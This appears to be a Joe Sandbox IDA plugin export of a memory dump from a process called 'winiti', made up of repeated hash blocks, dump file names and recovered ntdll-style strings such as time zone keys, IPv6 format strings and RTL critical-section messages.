                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                          • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                          • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                          • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                          • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                          • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                          • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                          • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                          • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                          • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                          • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                          • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                          • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                          • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                          • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                          • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                          • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                          • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                          • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                          APIs
                          Strings
                          • Kernel-MUI-Language-SKU, xrefs: 009089FC
                          • Kernel-MUI-Language-Allowed, xrefs: 00908827
                          • WindowsExcludedProcs, xrefs: 009087C1
                          • Kernel-MUI-Number-Allowed, xrefs: 009087E6
                          • Kernel-MUI-Language-Disallowed, xrefs: 00908914
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: _wcspbrk
                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                          • API String ID: 402402107-258546922
                          • Opcode ID: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                          • Instruction ID: d5b8b31f5906aec0b39d198ffaf365a0d44bee7c5842811dc6851a4495d599da
                          • Opcode Fuzzy Hash: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                          • Instruction Fuzzy Hash: 01F1F8B2D00649EFCF11EF99C981AEEBBB8FF08300F14446AE515E7251EB349A45DB61
                          APIs
                          Strings
                          Similarity
                          • API ID: _wcsnlen
                          • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                          • API String ID: 3628947076-1387797911
                          • Opcode ID: 94cc65138088aaf12ac7b9c706a31ea4c9d1c57bfd2816538c7d431ced99241e
                          • Instruction ID: 3905be80095cfb6ff74068722eab242d8ad30eb49863eaa65b396ecb213c7b51
                          • Opcode Fuzzy Hash: 94cc65138088aaf12ac7b9c706a31ea4c9d1c57bfd2816538c7d431ced99241e
                          • Instruction Fuzzy Hash: 5041B877288209BAEB119AE5CC4AFDFB76CEF44B44F108112FA08D5191DBB0DB119BB4
                          APIs
                          Strings
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                          • Instruction ID: fa12d8b7a289918ab0646b0c93a12e58c6cad99d3e65512d48ca47a8b15c9844
                          • Opcode Fuzzy Hash: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                          • Instruction Fuzzy Hash: 1B614B71A04665A6CF34DF99D8808BEBBBAFFE5300B14C42DF4DA47684D374AA50CB60
                          APIs
                          Strings
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 166c9c3691c59b01739987b355ce8103c9fba79d72c3c2f2340eb276ad7a32ef
                          • Instruction ID: 6f7eaef54e234bf2db67bbd9f57db28a6a4cd768a0ea0da92bf265e6188815c8
                          • Opcode Fuzzy Hash: 166c9c3691c59b01739987b355ce8103c9fba79d72c3c2f2340eb276ad7a32ef
                          • Instruction Fuzzy Hash: 8D61A3B2900648ABCF20EFADC84197E7BF9EF59710B14C529FCE997241E274EB419B50
                          APIs
                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00933F12
                          Strings
                          • ExecuteOptions, xrefs: 00933F04
                          • Execute=1, xrefs: 00933F5E
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0093E2FB
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00933F4A
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 0093E345
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00933EC4
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00933F75
                          Similarity
                          • API ID: BaseDataModuleQuery
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 3901378454-484625025
                          • Opcode ID: ff7baaf40b6bf58b9e4e48120d924cbc832683b053e0247b933c9944f3afab8d
                          • Instruction ID: 41e9fa84d98052e166f9121288f570dd953eeb524a931df6e2d59f36ad310da4
                          • Opcode Fuzzy Hash: ff7baaf40b6bf58b9e4e48120d924cbc832683b053e0247b933c9944f3afab8d
                          • Instruction Fuzzy Hash: 7441B771B8021D7ADF20DA95DC86FEBB3BCEB55700F0005A9B505E6181EA70DB86CF61
                          APIs
                          Strings
                          Similarity
                          • API ID: __fassign
                          • String ID: .$:$:
                          • API String ID: 3965848254-2308638275
                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                          • Instruction ID: e7518ee24c2a4bf2819fd4e7c2a167ef7b5dd7bafd6ddcd47e9d4fd54f6df8fb
                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                          • Instruction Fuzzy Hash: 1DA18DB1D0032ADFDF24CF64E8456BEB7B8BBD5304F24856AD482A724BD6349A41CB51
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00942206
                          Strings
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-4236105082
                          • Opcode ID: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                          • Instruction ID: 793d0a2ddc17d124f23479943d463c3082c7fe029ffe019ac97662dd03e1cd72
                          • Opcode Fuzzy Hash: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                          • Instruction Fuzzy Hash: 91513831B442116FEB14DF19DC81FA633AEBFD8720F218229FD59DB286D965EC418B90
                          APIs
                          • ___swprintf_l.LIBCMT ref: 0094EA22
                            • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 0092146B
                            • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 00921490
                          • ___swprintf_l.LIBCMT ref: 0092156D
                          Strings
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          • Opcode ID: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                          • Instruction ID: b86a9c3584357acc35dd5c5c0693380c57c963b60c5937a2bbfa751d57c5921c
                          • Opcode Fuzzy Hash: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                          • Instruction Fuzzy Hash: A621C372A002299BCF21DE58DC41EEAB3BCFBA0700F444551FC46D3245DB749A698BE1
                          APIs
                          Strings
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009422F4
                          Strings
                          • RTL: Resource at %p, xrefs: 0094230B
                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009422FC
                          • RTL: Re-Waiting, xrefs: 00942328
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-871070163
                          Strings
                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009424BD
                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0094248D
                          • RTL: Re-Waiting, xrefs: 009424FA
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                          • API String ID: 0-3177188983
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: __fassign
                          • String ID:
                          • API String ID: 3965848254-0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: $$0
                          • API String ID: 1302938615-389342756